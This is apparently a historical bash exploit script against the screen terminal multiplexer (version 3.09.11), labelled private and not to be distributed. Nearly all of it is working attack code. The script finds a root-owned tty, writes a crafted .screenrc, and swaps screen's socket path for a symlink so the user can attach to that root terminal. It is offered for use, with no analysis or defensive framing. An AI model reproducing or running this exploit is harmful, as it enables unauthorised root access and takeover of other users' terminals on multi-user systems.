#!/bin/bash
# **DO NOT DISTRIBUTE**
#
# A simple screen(1) exploit (tested against 3.09.11)
# - by Michal Zalewski (lcamtuf@bos.bindview.com)
# ----------------------------------------------------
# Usage: "./unscreen", then resume screen `00'.
# ----------------------------------------------------
# Ugh, blah... Should be written in C, but I don't
# really care now :)
# I haven't had time to check other versions, but see
# if this works for you too...
#
# This exploit is private, but you know that already...
#
# **DO NOT DISTRIBUTE**
#
SCREEN=/usr/bin/screen
umask 0
if [ ! -x $SCREEN ]; then
echo "I can't execute $SCREEN..."
exit 0
fi
LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa
if [ -f "$LINK" ]; then
echo "DAMN. I don't have usable pts socket available..."
exit 0
fi
echo -ne "Finding root owned tty...\t\t"
unset TTY
for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
TTY="$x"
break
fi
done
echo -n "$TTY"
if [ "$TTY" = "" ]; then
echo -e "\nI can't find a root owned tty!"
exit 0
fi
if [ ! -w $HOME -o ! -w /tmp ]; then
echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
exit 0
fi
cat >$HOME/.screenrc <<_EOF_
vbell on
defscrollback 100
autodetach on
termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'
defsocketpath $LINK
_EOF_
echo -ne "\nStarting screen...\t\t\t"
$SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null &
SCPID=`echo $!`
echo -n "PID: $SCPID"
while :; do
sleep 1
if [ "$#" -ge "0" ]; then
break
fi
done
cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"
CNT=5 # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
let CNT=$CNT-1
sleep 1
done
echo -n "Done."
echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null
echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."
$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null
echo -ne "\rComplete.\n"
exit 1
syntax highlighted by Code2HTML, v. 0.9.1